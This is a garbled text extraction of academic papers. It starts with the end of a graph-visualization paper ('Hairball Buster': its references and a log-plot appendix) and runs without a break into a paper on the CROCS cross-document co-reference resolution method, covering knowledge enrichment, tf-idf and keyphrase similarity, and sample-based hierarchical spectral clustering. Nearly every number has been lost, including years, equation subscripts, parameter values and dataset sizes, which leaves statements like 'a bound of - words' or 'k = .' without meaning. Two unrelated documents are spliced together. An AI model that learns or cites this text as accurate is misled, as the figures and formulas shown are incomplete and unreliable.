ortmann, m. and brandes, u. . untangling the hairballs of multi-centered, small- world online social media networks. 
journal of graph algorithms and applications ( ): – , available at: https://doi.org/ . /jgaa. . peterson, e. . time spring layout for visualization of dynamic social networks. ieee network science workshop, pp. – , available at: https://doi.org/ . /nsw. . . sheny, z. and maz, k.-l. . path visualization for adjacency matrices. proceedings of the th joint eurographics/ieee vgtc conference on visualization, – , available at: https://doi.org/ . /vissym/ eurovis / - . squartini, t., mastrandrea, r. and garlaschelli, d. . unbiased sampling of network ensembles. new journal of physics, ( ): , available at: https:// doi.org/ . / - / / / . twitter™ . twitter™ website, data set regarding election integrity, periscope, scope and the periscope logo are trademarks of twitter, inc. or its affiliates, available at: https://about.twitter.com/ en_us/values/elections-integrity.html#data (accessed november , ). ware, c. . visual thinking: for design. elsevier, amsterdam. wasserman, s. and faust, k. . social network analysis by stanley wasserman, cambridge university press, available at: https://doi.org/ . / cbo (accessed october , ). white, h. c., boorman, s. a. and breiger, r. l. . social structure from multiple networks. i. blockmodels of roles and positions. american journal of sociology, ( ): – , available at: https://doi. org/ . / . zweig, k. a. . network analysis literacy: a practical approach to the analysis of networks. springer science & business media, wein, p. . connections appendix. semi–log and log–log displays for the hairball buster approach for very large data sets, a cartesian representa- tion of the hb algorithm may not be sufficient to encompass the whole data set. although the hb approach has been successfully applied to data sets with over , nodes displayed on carte- sian coordinates, there exist much larger data sets for which a semi–log or log–log display would be needed to represent all of the data in a single hb chart. (in this appendix, we will always be referring to log-base- .) when simply taking the semi–log or log–log of a data set, we immediately discovered that the display is dominated by the first few nodes, leaving little visual benefit in the remaining part of the chart. see figure a for an example of a log–log display based on the jazz player data set. this does not present particularly useful information to the analyst. however, there is an easy solution to this problem. by adding either or to all of the data points, we are essentially creating an ‘offset’ of the origin to point , or point , . figure a shows an offset of the origin to the point at coordinates , for the jazz player data set. although a relatively small data set, figure a : sample log –log plot of jazz player data set with no offset. figure a : sample offset of origin to , for log –log plot of jazz player data set. hairball buster: a graph triage method for viewing and comparing graphs figure a : sample offset of origin to , for semi–log plot of toaster data set. this example shows how the offset of the origin allows a much smoother and continuous representation of the curve compared to figure a . (one needs to remember that when reading the chart, the origin has been offset.) figure a shows the toaster data set in semi–log format. no offset was needed because the log of one is . since most of the connections are of degree , the origin of zero–zero works. however, the display tool the authors applied would not display anything at coordinate value of for the y-axis. 
therefore, we placed the degree one nodes at the lowest y-value on the semi–log display. cross-document co-reference resolution using sample-based clustering with knowledge enrichment sourav dutta max planck institute for informatics saarbrücken, germany sdutta@mpi-inf.mpg.de gerhard weikum max planck institute for informatics saarbrücken, germany weikum@mpi-inf.mpg.de abstract identifying and linking named entities across information sources is the basis of knowledge acquisition and at the heart of web search, rec- ommendations, and analytics. an important problem in this context is cross-document co- reference resolution (ccr): computing equiv- alence classes of textual mentions denoting the same entity, within and across documents. prior methods employ ranking, clustering, or probabilistic graphical models using syntactic features and distant features from knowledge bases. however, these methods exhibit limita- tions regarding run-time and robustness. this paper presents the crocs framework for unsupervised ccr, improving the state of the art in two ways. first, we extend the way knowledge bases are harnessed, by con- structing a notion of semantic summaries for intra-document co-reference chains using co- occurring entity mentions belonging to differ- ent chains. second, we reduce the computa- tional cost by a new algorithm that embeds sample-based bisection, using spectral clus- tering or graph partitioning, in a hierarchi- cal clustering process. this allows scaling up ccr to large corpora. experiments with three datasets show significant gains in output qual- ity, compared to the best prior methods, and the run-time efficiency of crocs. introduction . motivation and problem statement we are witnessing another revolution in web search, user recommendations, and data analytics: tran- sitioning from documents and keywords to data, knowledge, and entities. examples of this mega- trend are the google knowledge graph and its ap- plications, and the ibm watson technology for deep question answering. to a large extent, these ad- vances have been enabled by the construction of huge knowledge bases (kb’s) such as dbpedia, yago, or freebase; the latter forming the core of the knowledge graph. such semantic resources provide huge collections of entities: people, places, compa- nies, celebrities, movies, etc., along with rich knowl- edge about their properties and relationships. perhaps the most important value-adding com- ponent in this setting is the recognition and dis- ambiguation of named entities in web and user contents. named entity disambiguation (ned) (see, e.g., (cucerzan, ; milne & witten, ; cornolti et al., )) maps a mention string (e.g., a person name like “bolt” or a noun phrase like “light- ning bolt”) onto its proper entity if present in a kb (e.g., the sprinter usain bolt). a related but different task of co-reference reso- lution (cr) (see, e.g., (haghighi & klein, ; ng, ; lee et al., )) identifies all mentions in a given text that refer to the same entity, including anaphoras such as “the president’s wife”, “the first lady”, or “she”. this task when extended to process an entire corpus is then known as cross-document co-reference resolution (ccr) (singh et al., ). it takes as input a set of documents with entity men- tions, and computes as output a set of equivalence classes over the entity mentions. this does not in- volve mapping mentions to the entities of a kb. 
un- like ned, ccr can deal with long-tail or emerging entities that are not captured in the kb or are merely in very sparse form. state of the art and its limitations. cr methods, for co-references within a document, are generally based on rules or supervised learning using differ- transactions of the association for computational linguistics, vol. , pp. – , . action editor: hwee tou ng. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. ent kinds of linguistic features like syntactic paths between mentions, the distances between them, and their semantic compatibility as derived from co- occurrences in news and web corpora (haghighi & klein, ; lee et al., ). some methods ad- ditionally use distant labels from knowledge bases (kb’s). cluster-ranking and multi-sieve methods in- crementally expand groups of mentions and exploit relatedness features derived from semantic types, alias names, and wikipedia categories (rahman & ng, a; ratinov & roth, ). the ccr task - computing equivalence classes across documents - is essentially a clustering prob- lem using a similarity metric between mentions with features like those discussed above. however, standard clustering (e.g., k-means or em variants, cluto, etc.) lacks awareness of the transitivity of co-reference equivalence classes and suffers from knowledge requirement of model dimensions. prob- abilistic graphical models like markov logic net- works (richardson & domingos, ; domingos et al., ; domingos & lowd, ) or factor graphs (loeliger, ; koller & friedman, ) take into consideration constraints such as transi- tivity, while spectral clustering methods (luxburg, ) implicitly consider transitivity in the underly- ing eigenspace decomposition, but suffer from high computational complexity. in particular, all methods need to precompute features for the data points and similarity values between all pairs of data points. the latter may be alleviated by pruning heuristics, but only at the risk of degrading output quality. note that ccr cannot be addressed by simply applying local cr to a “super-document” that con- catenates all documents in the corpus. within a document, identical mentions typically refer to the same entity, while in different documents, identical mentions can have different meanings. although a cross-document view gives the opportunity to spot joint cues from different contexts for an entity, doc- uments vary in their styles of referring to entities and merely combining the local co-reference chains into a super-group might lead to substantial noise intro- duction. in addition, cr methods are not designed for scaling to huge “super-documents” correspond- ing to millions of web pages or news articles. problem statement. we aim to overcome the above limitations by proposing a ccr method that makes rich use of distant kb features, considers transitiv- ity, and is computationally efficient. . approach and contribution in this paper, we efficiently tackle the ccr problem by considering co-occurring mentions and rich features from external knowledge bases, and using a transitivity-aware sampling-based hierarchical clustering approach. we developed the crocs (cross-document co-reference resolution) frame- work with unsupervised hierarchical clustering by repeated bisection using spectral clustering or graph partitioning. crocs harnesses semantic features derived from kb’s by constructing a notion of semantic summaries (semsum’s) for the intra-document co-reference chains. 
in addition to incorporating kb labels as features for the co- referring mentions, we also consider co-occurring mentions belonging to other entities and utilize their features. consider the text: hillary lived in the white house and backed bill despite his affairs. containing men- tion groups: {“hillary”}, {“bill”}, and {“white house”}. merely obtaining distant kb features for the first mention group, the sparse information leads to high ambiguity, e.g., may refer to the mountaineer sir edmund hillary. but by also obtaining features from kb for “white house” (co-occurring mention), we obtain much stronger cues towards the correct solution. crocs adopts a bisection based clustering method and invokes it repeatedly in a top-down hi- erarchical procedure with an information-theoretic stopping criterion for cluster splitting. we escape the quadratic run-time complexity for pair-wise sim- ilarity computations by using a sampling technique for the spectral eigenspace decomposition or for graph partitioning. this is inspired by the recent work of (krishnamurty et al., ; wauthier et al., ) on active clustering techniques. similar- ity computations between mention groups are per- formed lazily on-demand for the dynamically se- lected samples. in a nutshell, the novel contributions are: • crocs, a framework for cross-document co- reference resolution using sample-based spectral clustering or graph partitioning embedded in a hierarchical bisection process; • semsum’s, a method for incorporating distant features from kb’s also considering the cou- pling between co-occurring mentions in differ- ent co-reference chains; • experimental evaluation with benchmark cor- pora demonstrating substantial gains over prior methods in accuracy and run-time. computational framework the crocs model assumes an input set of text documents d = {d ,d , . . .}, with markup of entity mentions m = {m ,m , . . . ,m ,m , . . .}, mij ∈ dj, present in the documents. crocs computes an equivalence relation over m with equivalence classes cj, where cj ∩ ck = ∅ for j = k and ∪jcj = m. the number of desired classes is apriori unknown; it needs to be determined by the algorithm. detecting the mentions and marking their boundaries within the text is a problem by itself, referred to as ner (named entity recognition). this paper does not address this issue and relies on established methods. the crocs framework consists of stages: . intra-document cr: given an input corpus, d with mentions m, we initially perform intra- document co-reference resolution. . knowledge enrichment: for each of the local mention groups ({mij}) obtained in the previ- ous step, we combine the sentences of the men- tions to determine the best matching entity in a kb and retrieve its features. analogous steps are performed for co-occurring mentions (of {mij}) and their features included. we term this feature set of {mij} as semantic summary (semsum’s). . similarity computation: we compute similar- ity scores between mention groups based on the features extracted above. these are computed on-demand, and only for a sampled subset of mentions (avoiding quadratic computation cost). . sampling-based clustering: we perform spec- tral clustering or balanced graph partitioning (using the similarity metric) in a hierarchi- cal fashion to compute the cross-document co- reference equivalence classes of mentions. 
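before detailing the individual stages, the following sketch shows how they could be wired together; the function names and signatures are ours, used only to make the data flow explicit, and do not correspond to the actual crocs code:

```python
def crocs_pipeline(documents, local_cr, enrich, similarity, cluster):
    """Wire together the four CROCS stages described above.

    The four callables stand in for the components discussed in the text:
    local_cr(doc) -> local mention groups, enrich(group) -> semantic summary,
    similarity(semsum1, semsum2) -> score, and
    cluster(groups, sim_fn) -> cross-document equivalence classes of mentions.
    """
    # Stage 1: intra-document co-reference resolution, per document
    groups = [g for doc in documents for g in local_cr(doc)]

    # Stage 2: knowledge enrichment -> one SemSum per local mention group
    semsums = {id(g): enrich(g) for g in groups}

    # Stage 3: similarity is computed lazily, on demand, for sampled pairs only
    def sim(g1, g2):
        return similarity(semsums[id(g1)], semsums[id(g2)])

    # Stage 4: sample-based hierarchical bisection (spectral or graph partitioning)
    return cluster(groups, sim)
```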
intra-document cr crocs initially pre-processes input documents to cast them into plain text (using standard tools like (https://code.google.com/p/ boilerpipe/), (www.jsoup.org), etc.). it then uses the stanford corenlp tool suite to detect mentions and anaphors (http://nlp. stanford.edu/software/). the detected mentions are also tagged with coarse-grained lexi- cal types (person, organization, location, etc.) by the stanford ner tagger (finkel et al., ). this forms the input to the intra-document cr step, where we use the state-of-the-art open-source cr tool (based on multi-pass sieve algorithm) from stanford to compute the local mention co-reference chains (raghunathan et al., ; lee et al., ; lee et al., ). the tagged texts and the local co- reference chains are then passed to the second stage. this local cr step may produce errors (e.g., in- correct chaining of mentions or omissions) which propagate to the later stages. however, improving intra-document cr is orthogonal to our problem and thus out of the scope of this paper. our experiments later show that crocs is robust and produces high- quality output even with moderate errors encoun- tered during the local-cr stage. knowledge enrichment the knowledge enrichment phase starts with the local co-reference chains per document. assume that we have obtained mention groups (chains) {michelle, she, first lady} and {the president’s wife, first lady} from two documents. to assess whether these two chains should be combined, i.e., they both refer to the same entity, we compute seman- tic features by tapping into knowledge bases (kb’s). specifically, we harness labels and properties from freebase.com entries, for possibly matching enti- ties, to enrich the features of a mention group. the kb features form a part of the semantic summary or semsum’s for each local mention group. features de- rived from the constructed semsum’s are later used to compare different mention groups via a similarity measure (described in section ). formally, a mention m is a text string at a partic- ular position in a document. m belongs to a mention group m(m) consisting of all equivalent mentions, with the same string (at different positions) or differ- ent strings. for a given m, the basic semsum of m, sbasic(m), is defined as sbasic(m) = {t ∈ sentence(m′)|m′ ∈ m(m)} ∪ {t ∈ label(m′)|m′ ∈ m(m)} where t are text tokens (words or phrases), sentence(m′) is the sentence in which mention m′ occurs, and label(m′) is the semantic label for m′ obtained from the kb. note that sbasic(m) is a bag of tokens, as different mentions in m(m) can obtain the same tokens or labels and there could be multi- ple occurrences of the same mention string in m(m) anyway. prior works on cr (e.g., (rahman & ng, a; ratinov & roth, ; hajishirzi et al., ; zheng et al., )) and ned (e.g., (cucerzan, ; milne & witten, ; ratinov et al., ; hoffart et al., ; hajishirzi et al., )) have considered such form of distant features. crocs extends these pre- vious methods by also considering distant features for co-occurring mention groups, and not just the group at hand. we now introduce a general frame- work for knowledge enrichment in our ccr setting. strategies for knowledge enrichment involve de- cision making along the following dimensions: • target: items (single mentions, local mention groups, or global mention groups across docu- ments) for which semantic features are obtained. • source: the resource from where semantic fea- tures are extracted. 
existing methods consider a variety of choices: i) input corpora, ii) external text corpus, e.g., wikipedia, and iii) knowledge bases such as freebase, dbpedia, or yago. • scope: the neighborhood of the target consid- ered for enrichment. it can either be restricted to the target itself or can consider co-occurring items (other mention groups connected to the target). • match: involves mapping the target to one or more relevant items in the source, and can in- volve simple name queries to full-fledged ned based on relevance or score confidence. existing methods generally consider individual mentions or local mention groups as target. ex- tended scopes like co-occurring entities based on automatic ner and ie techniques have been pro- posed (mann & yarowsky, ; niu et al., ; chen & martin, ; baron & freedman, ), but use only the input corpus as the enrichment source. recent methods (rahman & ng, a; ratinov & roth, ; hajishirzi et al., ; zheng et al., ) harness kb’s, but consider only lo- cal mention groups. also, these methods rely on high-quality ned for mapping mentions to kb en- tries. in contrast, crocs considers extended scopes that include mention groups along with co- occurring mention groups when tapping into kb’s. we make only weak assumptions on matching men- tions against kb entities, by filtering on confidence and merely treating semsum’s as features rather than relying on perfectly mapped entities. specifically, our crocs method handles the four dimensions of knowledge enrichment as follows: enrichment target: we use per-document mention groups, after the local cr step, as target. in princi- ple, we could repeat the enrichment during the itera- tions of the ccr algorithm. however, as crocs performs top-down splitting of groups rather than bottom-up merging, there is no added value. enrichment source: we include all the sentences of a mention group in its semsum’s, thus drawing on the input document itself. the main enrichment har- nesses entity-structured kb’s like freebase or yago by querying them with phrases derived from the mention groups’ summaries. the features that are extracted from the best-matching entity include se- mantic types or categories (e.g., “politician”, “award nominee”), alias names (e.g., “michelle robinson”), titles (e.g., “first lady of the united states”) and gender of people. these features are appended to the semsum’s and form the core of a mention group’s semantic summary. enrichment scope: crocs includes co- occurring mention groups as additional targets for semantic features. consider the example sentences in figure . suppose the local cr finds mention groups as shown. the mentions and the sentences in which they occur are represented as a bipartite graph depicting their connections (right side of fig. ). consider the mention group of “president’s wife” (m ) and “first lady” (m ). together with their immediate sentence neighbors in the bipartite graph, these mentions form what we call the basic scope for knowledge enrichment, i.e., {m ,s ,m ,s }. the sentences of this mention group contain other mentions which can be in mention groups spanning further sentences. we utilize this co- occurrence as additional cues for characterizing the mention group at hand. the union of the current scope with that of all the two-hop neighbors in the bipartite graph form the extended scope. for the group {m ,s ,m ,s }, the two-hop men- tion neighbors are {m ,m ,m ,m }. 
hence, we include the scopes of these groups, the men- tions and sentences, yielding the extended scope {m ,s ,m ,s ,m ,m ,m ,s }. formally, for mention m in mention group m(m), its extended semsum sextended(m) is: sextended(m) = sbasic(m) ∪( ⋃ m′ ( sbasic(m ′) | ∃s : m′ ∈ s∧m ∈ s ) ) where s is a sentence in which both m and m′ occur. in principle, we could consider even more aggres- sive expansions, like -hop neighbors or transitive closures. however, our experiments show that the -hop extension is a sweet spot that gains substan- tial benefits over the basic scope. enrichment matching: for each local mention group, crocs first inspects the coarse-grained types (person, organization, location) as determined by the stanford ner tagger. we consider pronouns to derive additional cues for person mentions. if all tags in a group agree, we mark the group by this tag; otherwise the group as a whole is not type-tagged. to match a mention group against a kb entity, we trigger a phrase query comprising tagged phrases from the mention group to the kb interface . we remove non-informative words from the phrases, dropping articles, stop-words, etc. for example, the first mention group, {m ,m } in fig. leads to the query "president wife first lady". the query results are filtered by matching the result type- tag with the type tag of the mention group. for the extended scope, we construct analogous queries for the co-occurring mentions: "white house us president residence" and "husband" in the example. the results are processed as follows. we primarily rely on the kb service itself to rank the matching entities by confidence and/or rele- vance/importance. we simply accept the top-ranked entity and its kb properties, and extend the sem- sum’s on this basis. this is also done for the co- occurring mention groups, leading to the extended scope of the original mention group considered. to avoid dependency on the ranking of the kb, we can alternatively obtain the top-k results for each query and also the kb’s confidence for the entity matching. we then re-rank the candidates by our similarity measures and prune out candidates with low confidence. we introduce a confidence thresh- old, θ, such that all candidates having matching con- fidence below the threshold are ignored, i.e., the for example, (https://gate.d .mpi-inf.mpg.de/ webyagospotlx/webinterface) or (www.freebase.com/ query) m s s s s m m m m m m m m m m s s s s m m m m m m m m m m m the president‘s wife lives in the white house. the first lady helps her husband with the duties in the president‘s residence. the white house is located in washington dc and is the home of the us president. the american president and his wife live in washington. figure : example of local mention groups. 
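the basic and extended scopes can be expressed compactly over the mention–sentence bipartite graph. the sketch below is our illustration of the definitions above (the data structures are assumptions; the actual system operates on corenlp output):

```python
def basic_semsum(group, sentence_of, label_of):
    """S_basic: sentences of all mentions in the group plus their KB labels (a bag of tokens)."""
    tokens = []
    for m in group:
        tokens.extend(sentence_of[m].split())
        tokens.extend(label_of.get(m, []))
    return tokens

def extended_semsum(group, all_groups, sentence_of, label_of):
    """S_extended: the basic scope plus the basic scopes of all mention groups
    that share a sentence with this group (its two-hop neighbors in the
    mention-sentence bipartite graph)."""
    own_sentences = {sentence_of[m] for m in group}
    summary = basic_semsum(group, sentence_of, label_of)
    for other in all_groups:
        if other is group:
            continue
        if any(sentence_of[m] in own_sentences for m in other):
            summary += basic_semsum(other, sentence_of, label_of)
    return summary
```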
algorithm : extendedknowledgeenrichment require: text t , set g of mention groups (from stanford corenlp), kb match threshold θ, knowledge base kb ensure: semsum for each group in g : for each mention group, m ∈ g do : basic scope: semsumm ← sentences from t containing mentions in m : extract and add kb features for mentions and phrases in semsumm (sbasic(m)) : extended scope: append context of -hop co-occurring mentions (from bipartite graph) to semsumm : matching: extract phrases from semsumm for query generation to kb : retrieve highest ranked kb result entity e : if match confidence of e > θ then : extract set of features for e, le from kb : append le to semsumm (sextended(m)) : end if : end for : output semsumm for all m ∈ g entire mention group is disregarded in the semsum construction. this makes extended scope robust to noise. for example, the mention group {husband} having low confidence would likely degrade the semsum’s quality and is thus dropped. feature vector: the semsum’s of the mention groups comprise sentences and bags of phrases. for the example mention group {m ,m }, we include the sentences {s ,s ,s } during the extended-scope enrichment, and obtain phrases from the kb like: “michelle obama”, “first lady of united states”, “capital of the united states”, etc. algorithm shows the pseudo-code for constructing semsum’s. crocs next casts each semsum into two forms, (i) a bag of words, and (ii) a bag of keyphrases, and uses both for constructing a feature vector. similarity computation crocs compares mention groups by a similarity measure to infer whether they denote the same entity or not. the similarity is based on the feature vec- tors of mention groups (constructed as in section ). each feature in a mention group’s vector is weighted using ir-style measures according to the bag-of- words (bow ) model or the keyphrases (kp ) model for the semsum’s. empirically, the best approach is a mixture of both the words and keyphrases model, which is employed by crocs. similarity compar- isons are computed on-demand and only for a small sampled set of mention groups, as required during the hierarchical clustering procedure (see section ). the similarity of two mentions groups g ,g is, sim(g ,g ) = α×simbow (g ,g ) + ( −α) ×simkp (g ,g ) where α is a tunable hyper-parameter. whenever two mention groups are to be combined (referring to the same entity), their feature vectors are combined by computing a bag union of their words and/or phrases, and then recomputing the weights. with- out loss of generality, our default setting is α = . . bag-of-words model (bow): for this model, we compute the term frequency, tf(w) for each word w in the semsum’s, and also the inverse document frequency, idf(w), of the word across all semsum’s (i.e., all mention groups from all input documents). the weight of w , wgt(w) = tf(w) × idf(w). as the semsum’s are short, we use the simple product rather than dampening tf values or other variations. alternatively, more advanced ir weighting models such as okapi bm or statistical language models can be used. however, the classical tf×idf measure works quite well. crocs computes the similarity of two feature vectors by their cosine distance. keyphrases model (kp): the keyphrases of a men- tion group are obtained by extracting proper names, titles, alias names, locations, organization, etc., from its semsum’s. similar to the bow model, crocs supports tf×idf style weights for entire keyphrases. 
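as an illustration of the bow model just described, the following sketch computes tf×idf weights over semsum's and the cosine score used to compare two weighted vectors; the plain dictionary representation is an assumption made for brevity, not the actual crocs data structure.

```python
import math
from collections import Counter

def tfidf_vectors(semsums):
    """semsums: mention-group id -> list of words drawn from that group's semsum."""
    n = len(semsums)
    df = Counter()
    for words in semsums.values():
        df.update(set(words))
    vectors = {}
    for gid, words in semsums.items():
        tf = Counter(words)
        # simple tf x idf, with no tf dampening, as the semsum's are short
        vectors[gid] = {w: tf[w] * math.log(n / df[w]) for w in tf}
    return vectors

def cosine_similarity(u, v):
    dot = sum(weight * v.get(w, 0.0) for w, weight in u.items())
    norm_u = math.sqrt(sum(x * x for x in u.values()))
    norm_v = math.sqrt(sum(x * x for x in v.values()))
    return dot / (norm_u * norm_v) if norm_u and norm_v else 0.0
```

sim_bow(g1, g2) is then cosine_similarity(vectors[g1], vectors[g2]), which later enters the α-mixture together with the keyphrase score.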
for computing the similarity of keyphrases between two mention groups $g_1$ and $g_2$, crocs matches the keyphrases of $g_1$ in the semsum's of $g_2$, and vice versa. however, entire phrases rarely match exactly. for example, the keyphrase "peace nobel" matches only partially in the text "nobel prize for peace". to consider such partial matches and reward both high overlap of words and short distances between matching words (locality), we adopt the scoring model of (taneva et al., ). the score for a partial match of keyphrase p in text x is

$s(p|x) = \frac{\#\,\text{matching words}}{\text{length of } cov(p|x)} \cdot \left( \frac{\sum_{w \in cov(p)} wgt(w)}{\sum_{w \in p} wgt(w)} \right)^{1+\gamma}$

where the cover cov(p|x) of p in x is the shortest word span (in x) containing all the words of p present in x (with a bound of - words). for the example above, the cover of p = "peace nobel" in the text x is "nobel prize for peace" (all words matching, with cover length ). the parameter γ (0 < γ < 1) serves to tune the progression of penalizing missing words. in our experiments, γ was set to . , and stop-words such as "a", "the", etc. were removed with only keywords being considered. for mention groups $g_1$ and $g_2$, we compute

$sim(g_1|g_2) = \sum_{p \in KP(g_1)} wgt(p) \times s(p \mid \text{semsum's}(g_2))$

finally, we resolve the asymmetry in the similarity measure due to the ordering of the two groups by setting

$sim(g_1, g_2) = \max\{\, sim(g_1|g_2),\; sim(g_2|g_1) \,\}$

clustering algorithm

the final stage of crocs takes the mention groups and the semsum's as input. it performs a top-down hierarchical bisection process, based on similarity scores among entities, to cluster together co-referring mention groups at each splitting level. initially all mention groups are placed in a single cluster, and are then recursively split until a stopping criterion finalizes a cluster as a leaf. at each level, cluster splitting is performed by using either spectral clustering (luxburg, ) or balanced graph partitioning (karypis & kumar, ). both these methods implicitly consider transitivity, which is essential as the equivalence classes of mentions should be transitively closed. the challenge of this seemingly simple procedure lies in (i) judiciously choosing and optimizing the details (model selection and stopping criterion), and (ii) reducing the computational cost. the latter is crucial as spectral clustering has cubic complexity, graph partitioning heuristics are expensive to compute, and ccr (unlike cr) needs to cope with web-scale inputs consisting of millions of documents and entities.

clustering is invoked for each of the coarse-grained entity types separately (as obtained from the stanford ner tagger): people, places, and organizations. the benefit is twofold: gaining efficiency and improving accuracy, as two different entity types would not co-refer in reality. however, the risk is that two differently tagged mention groups might actually refer to the same entity, with at least one tag being incorrect. our experiments show that the benefits clearly outweigh this risk. without loss of generality, we only consider chains that are tagged into one of the above types, and other co-reference chains are ignored. although this might lead to certain mentions being overlooked, improving the accuracy and recall of ner tagging approaches is orthogonal to our current scope of work.

active spectral clustering: spectral clustering (luxburg, ) uses the eigenspace of the similarity graph's laplacian matrix to compute graph partitions as clusters.
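as an aside, a small sketch of the keyphrase partial-match score and the symmetrized group similarity defined above; the γ value, the cover-length bound, and the uniform fallback weights are placeholder assumptions, since the exact settings are not spelled out here.

```python
def shortest_cover(phrase_words, text_words, max_span=10):
    """length of the shortest span in text containing every phrase word that occurs
    in the text at all (max_span is an assumed bound on the span length)."""
    present = {w for w in phrase_words if w in text_words}
    if not present:
        return None, present
    best = None
    for start, w in enumerate(text_words):
        if w not in present:
            continue
        seen = set()
        for end in range(start, min(start + max_span, len(text_words))):
            if text_words[end] in present:
                seen.add(text_words[end])
            if seen == present:
                span = end - start + 1
                best = span if best is None else min(best, span)
                break
    return best, present

def partial_match_score(phrase, text, wgt, gamma=0.25):   # gamma is a placeholder value
    p, x = phrase.lower().split(), text.lower().split()
    cover_len, matched = shortest_cover(p, x)
    if not cover_len:
        return 0.0
    weight_ratio = sum(wgt.get(w, 1.0) for w in matched) / sum(wgt.get(w, 1.0) for w in p)
    return (len(matched) / cover_len) * weight_ratio ** (1 + gamma)

def one_sided_sim(g1_phrases, g2_text, wgt):
    return sum(wgt.get(p, 1.0) * partial_match_score(p, g2_text, wgt) for p in g1_phrases)

def sim_kp(g1_phrases, g1_text, g2_phrases, g2_text, wgt):
    # resolve the asymmetry by taking the maximum of both directions
    return max(one_sided_sim(g1_phrases, g2_text, wgt),
               one_sided_sim(g2_phrases, g1_text, wgt))
```

and a minimal sketch of such a spectral split on a similarity matrix, using the sign of the normalized laplacian's second-smallest eigenvector (the fiedler vector):

```python
import numpy as np

def spectral_bisect(sim):
    """split the items behind a symmetric similarity matrix into two parts,
    based on the normalized laplacian's second-smallest eigenvector."""
    deg = sim.sum(axis=1)
    d_inv_sqrt = np.diag(1.0 / np.sqrt(np.maximum(deg, 1e-12)))
    laplacian = np.eye(len(sim)) - d_inv_sqrt @ sim @ d_inv_sqrt
    _, eigvecs = np.linalg.eigh(laplacian)   # eigh returns eigenvalues in ascending order
    return eigvecs[:, 1] >= 0.0              # boolean mask: which side each item falls on
```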
crocs adopts the recently proposed active spectral clustering technique (kr- ishnamurty et al., ; wauthier et al., ), which approximates the eigenspace of a laplacian with a small subset of sampled data points (mention groups in crocs). for n data points and sample size s in the order of o(log n), this technique re- duces the cost of spectral clustering from o(n ) to o(log n) (with bounded error). crocs initializes each bisection step by selecting s mention groups from a cluster and computes all pair-wise similari- ties among the sampled groups. spectral clustering is then performed on this subset to obtain a split into clusters. the non-sampled mention groups are as- signed to the closest cluster in terms of average dis- tance to cluster centroids. the children clusters are iteratively split further at next levels until the stop- ping criterion fires. balanced graph partitioning: balanced graph partitioning assigns the vertices of a graph into com- ponents of nearly the same size having few edges across components. the problem is np-complete, and several approximation algorithms have been proposed (buluc et al., ). crocs uses the metis software (http://glaros.dtc.umn. edu/gkhome/metis/metis/overview) to obtain mention group partitioning at each level of the hierarchical clustering. the underlying mention similarity graph is con- structed by sampling s mention groups, and sim- ilarities among them represented as edge weights. for mention groups not selected in the sample, sim- ilarities to only the s sample points are computed and corresponding edges created. the graph is then partitioned using metis (karypis & kumar, ) (multi-level recursive procedure) to minimize the edge-cuts thereby partitioning dissimilar men- tion groups. specifics of crocs: active spectral clustering (krishnamurty et al., ) uses random sampling, chooses the number of final clusters, k based on eigengap, and enforces a balancing constraint for the k clusters to be of similar sizes. crocs judi- ciously deviates from the design of (krishnamurty et al., ) as: • model selection: we choose a fixed number of partitions k at each cluster-splitting step of the hierarchical process. we use a small k value, typically k = . this avoids selecting model di- mension parameters, allowing the stopping cri- terion to decide the final number of clusters. • form of graph cut: crocs uses balanced nor- malized cut for graph partitioning (karypis & kumar, ). however, unbalanced cluster sizes with several singleton clusters (having only one mention group) might be formed. in our ccr setting, this is actually a natural outcome as many long-tail entities occur only once in the corpus. such mention groups significantly differ in semantic and contextual features compared to the other mention groups. hence, singleton clus- ter mentions have low similarity score (based on semsum’s) with other mentions groups. this translates to low edge weights in the underlying similarity graph structure (between mentions), thus forming favorable candidates in the initial phases of cluster splitting using minimum edge- cut based graph partitioning. therefore, crocs inherently incorporates early partition (during the clustering phase) of such possibly singleton mention clusters from the “main data”, thereby helping in de-noising and efficiency. • sampling: instead of sampling data points uni- formly randomly, we use biased sampling sim- ilar to initialization used in k-means clustering. 
starting with a random point, we add points to the sample set such that their average similarity to the already included points is minimized, thus maximizing the diversity among the samples.

stopping criterion of crocs: the sample-based hierarchical clustering process operates without any prior knowledge of the number of clusters (entities) present in the corpus. we use the bayesian information criterion (bic) (schwarz, ; hourdakis et al., ) as the stopping criterion to decide whether a cluster should be further split or finalized. bic is a bayesian variant of the minimum description length (mdl) principle (grunwald, ), assuming the points in a cluster to be gaussian distributed. the bic score of a cluster c with s (sampled) data points $x_i$ and cluster centroid $\bar{c}$ is:

$bic(c) = \sum_{i=1,\dots,s} \log\,(x_i - \bar{c})^2 + \log s$

the bic score for a set of clusters is the micro-averaged bic of the clusters. crocs splits a cluster c into sub-clusters $c_1, \dots, c_k$ iff the combined bic value of the children is greater than that of the parent; else c is marked as a leaf.

experimental evaluation

benchmark datasets: we performed experiments with the following three publicly available benchmarking datasets, thereby comparing the performance of crocs against state-of-the-art baselines under various input characteristics.

• john smith corpus: the classical benchmark for ccr (bagga & baldwin, ) comprising articles selected from the new york times. it includes mentions of different "john smith" person entities. all mentions pertaining to john smith within a document refer to the same person. this provides a small-scale but demanding setting for ccr, as most john smiths are long-tail entities unknown to wikipedia or any kb.

• weps- collection: a set of , web pages used in the web people search competition (artiles et al., ). the documents comprise the top web search results (using yahoo! search (as of )) for each of different people (obtained from wikipedia, acl' , and us census), covering both prominent entities (e.g., ivan titov, computer science researcher) and long-tail entities (e.g., ivan titov, actor).

• new york times (nyt) archive: a set of around . million news articles from the archives of the newspaper (sandhaus, ) extracted between january and june . we randomly select , articles from the time range of january , through june , , which contain about . million mentions, organized into . million local mention chains after the intra-document cr step.

in our experiments, we consider mentions of person entities as this is the most predominant and demanding class of entities in the datasets. the john smith and weps- datasets have explicit ground truth annotations, while the nyt contains editorial annotations for entities present in each article. for knowledge enrichment, we used freebase, although sensitivity studies explore alternative setups with yago.

evaluation measures: we use the established measures to assess the output quality of ccr methods:

• b f score (bagga & baldwin, ): measures the f score as a harmonic mean of precision and recall of the final equivalence classes. precision is defined as the ratio of the number of correctly reported co-references (for each mention) to the total number, while recall computes the fraction of actual co-references correctly identified. both the final precision and recall are computed by averaging over all mention groups.
